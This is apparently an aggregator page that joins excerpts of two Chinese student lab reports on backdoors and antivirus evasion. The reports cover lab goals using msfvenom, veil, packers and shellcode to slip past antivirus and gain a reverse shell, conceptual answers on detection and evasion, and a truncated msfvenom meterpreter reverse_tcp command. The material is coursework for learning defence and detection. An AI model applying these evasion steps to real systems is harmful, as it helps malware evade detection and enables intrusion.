virscan

2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践

江枫思渺然 提交于 2020-03-27 19:16:53
2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践 一、实验要求 了解metasploit、veil、加壳工具的使用方法,并利用以上软件实现后门程序与杀软之间的共存,并利用后门程序获取被攻击方的shell。 二、实验目标 1、正确使用msf编码器 2、msfvenom生成如jar之类的其他文件 3、使用veil进行免杀处理 4、使用upx加压缩壳,hyperion加加密壳 5、使用C + shellcode编程进行免杀 6、使用python + shellcode进行免杀(使用其他课堂未介绍方法) 7、通过组合应用各种技术实现恶意代码免杀 8、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三、实验过程 1.准备工作 (1)安装veil 用 sudo apt-get install veil 命令安装veil,如果有问题可以尝试使用 sudo apt-get update 和 sudo apt-get upgrade 命令更新一下软件包。 安装完成后使用 veil 命令打开veil,输入Y继续安装直到完成。期间可能会因为网络问题下载中断,并且需要手动确认部分软件的安装,这一准备工作需要较长的时间。 (2)hyperion加密壳应用 由于我的kali系统里没有hyperion的文件夹

20169205 2016-2017-2 《网络攻防技术》 免杀技术

孤者浪人 提交于 2020-03-06 06:08:45
20169205 2016-2017-2 《网络攻防技术》 免杀技术 一、基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。 启发式恶意软件检测 基于行为的恶意软件检测 如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码 改变攻击行为 基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码 实践总结与体会 此次实验使我深入了解了杀毒软件查杀的原理,以及恶意代码的伪装手段。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。因此,了解相关恶意程序的原理和伪装手段对提高网络安全意识和增强病毒防护能力由很大的帮助。 离实战还缺些什么技术或步骤? 实际环境中,我们很难将后门程序移植进靶机中,这就需要把这个后门程序伪装后绑定到一些正规的程序中来让后门程序进入靶机。另外我们需要对靶机的状态进行跟踪。 实践过程记录 1.使用msf编码器直接生成一个后门程序 msfvenom -p windows/meterpreter/reverse_tcp